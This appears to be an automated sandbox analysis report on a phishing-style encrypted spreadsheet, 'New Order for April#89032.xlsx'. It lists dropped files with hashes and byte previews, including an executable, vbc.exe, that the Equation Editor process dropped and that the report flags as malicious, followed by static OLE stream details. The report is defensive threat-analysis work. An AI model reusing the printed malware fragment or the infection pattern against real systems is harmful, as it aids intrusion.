Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A0B656B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10715
Entropy (8bit):	7.414910193109876
Encrypted:	false
SSDEEP:	192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
MD5:	FE450E7017E0F21A25701C4ABC68021B
SHA1:	06090A749D7077371AFBB5DC698C60FE861B676E
SHA-256:	B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
SHA-512:	815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............c......sBIT....\|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........\|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....\|..J @....... @..............?..... @......,^..O}..\|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..\|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F4CB40C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\611091FA.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
Category:	dropped
Size (bytes):	3455
Entropy (8bit):	7.774304410172069
Encrypted:	false
SSDEEP:	96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
MD5:	B6EE1614D1302AD75B751F7134E57AA8
SHA1:	CD0071E2B61C622CFA38FACE83826A42CD6F7116
SHA-256:	6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
SHA-512:	849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
Malicious:	false
Reputation:	low
Preview:	......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........\|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;\|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3659592
Entropy (8bit):	1.0022313728649812
Encrypted:	false
SSDEEP:	6144:YFPAuIU4U9tVvfJHGCOd+FPAuIU4U9tVvfJHGCOd2:YmIvhGJd+mIvhGJd2
MD5:	737130889222DA6A24DB863283F9AA2B
SHA1:	91A31F3169BCDC0CBFC1F47E75AABDA68C764DA0
SHA-256:	7B23C702859098656105259373C4A99936AEFF58064521496320532F23BE4772
SHA-512:	C2B7A34156164DD7E18E9CE206BCAF8324A9B545E035A14145CE98EF7D94664816676DF0E62DE31E0A6604EEAF7B036C3DCD59223ABF3DCB35EFC42EEF108FD9
Malicious:	false
Preview:	....l...............\...............dS.. EMF....H.7.....................V...........................fZ..U"..F...4...(...GDIC........l..u....................i...........................................i...A. ...]...............(.......].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AF88CAF.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D2F9C18.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10715
Entropy (8bit):	7.414910193109876
Encrypted:	false
SSDEEP:	192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
MD5:	FE450E7017E0F21A25701C4ABC68021B
SHA1:	06090A749D7077371AFBB5DC698C60FE861B676E
SHA-256:	B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
SHA-512:	815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
Malicious:	false
Preview:	.PNG........IHDR..............c......sBIT....\|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........\|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....\|..J @....... @..............?..... @......,^..O}..\|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..\|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70052995.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
Category:	dropped
Size (bytes):	3455
Entropy (8bit):	7.774304410172069
Encrypted:	false
SSDEEP:	96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
MD5:	B6EE1614D1302AD75B751F7134E57AA8
SHA1:	CD0071E2B61C622CFA38FACE83826A42CD6F7116
SHA-256:	6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
SHA-512:	849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........\|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;\|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7DE011E6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1F47D39.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C96B05B3.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
Category:	dropped
Size (bytes):	7934
Entropy (8bit):	7.877426792469052
Encrypted:	false
SSDEEP:	192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
MD5:	BBACB9E08630847C0E6E84B5100C40C3
SHA1:	FDE4F15306F56139583ECB5E0EC99884A3F32371
SHA-256:	79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
SHA-512:	E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................\|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)".... ...t}[...}.p......._.H...w...iG..D.....9......{..}.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE617A92.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
Category:	dropped
Size (bytes):	7934
Entropy (8bit):	7.877426792469052
Encrypted:	false
SSDEEP:	192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
MD5:	BBACB9E08630847C0E6E84B5100C40C3
SHA1:	FDE4F15306F56139583ECB5E0EC99884A3F32371
SHA-256:	79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
SHA-512:	E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................\|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)".... ...t}[...}.p......._.H...w...iG..D.....9......{..}.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D78A5477.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\Desktop\~$New Order for April#89032.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	881152
Entropy (8bit):	7.199964525474944
Encrypted:	false
SSDEEP:	12288:cSIIK2eESbfOEauXDylVOhrecPoFe/OIDIUSyBlt+vEHTwzZIKU6ke:cNIVUXXulVSBPo8OIDlJbzyI/
MD5:	5F968F612F82F74C96DD257793CF917D
SHA1:	004213F3E85514317B8A711EDC42A124BE378ADF
SHA-256:	2A0C31DCC49402D53D3907CBD0C79473E20B64AA098ADF71437946E58BD55299
SHA-512:	BAF41C5BC33A3349DFCF1B7A8978F002AB27A243A786BC80362132F757688AA366EE3A48A4CE071B39D9E9FDFAB04E5F204489D6BC23FEA7400CB5C9AABC2051
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.n`..............P.....F......fI... ...`....@.. ....................................@..................................I..O....`..,B........................................................................... ............... ..H............text...l)... ..................... ..`.rsrc...,B...`...D...,..............@..@.reloc...............p..............@..B................HI......H........?...H..........L................................................0............(....( .........(.....o!.........................("......(#......($......(%......(&....N..(....ol...('....&..((.....s)........s........s+........s,........s-............0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+...0......

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996699260832285
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	New Order for April#89032.xlsx
File size:	2269696
MD5:	d7928e685d37d907d102cecdf3d3ce8b
SHA1:	3404ab865cdfb6c4a71151f5ae7bd17b92206885
SHA256:	a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
SHA512:	280a8eb7c681c72f52f333d5b47fb983c6e5a971682f27e5ec74d7cce23910c8f7a8020e3dcb85e9a4390c5859d206fcaabd6f3d023d523094ea52998cac345a
SSDEEP:	49152:D9jq8xY13JlsDo7RssRoodbu140WsTTmSgCu1E5:xFG3jRFnbS6smrCu1E
File Content Preview:	........................>...................#....................................................................................................................................... ...!..."...#...$...%......................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "New Order for April#89032.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
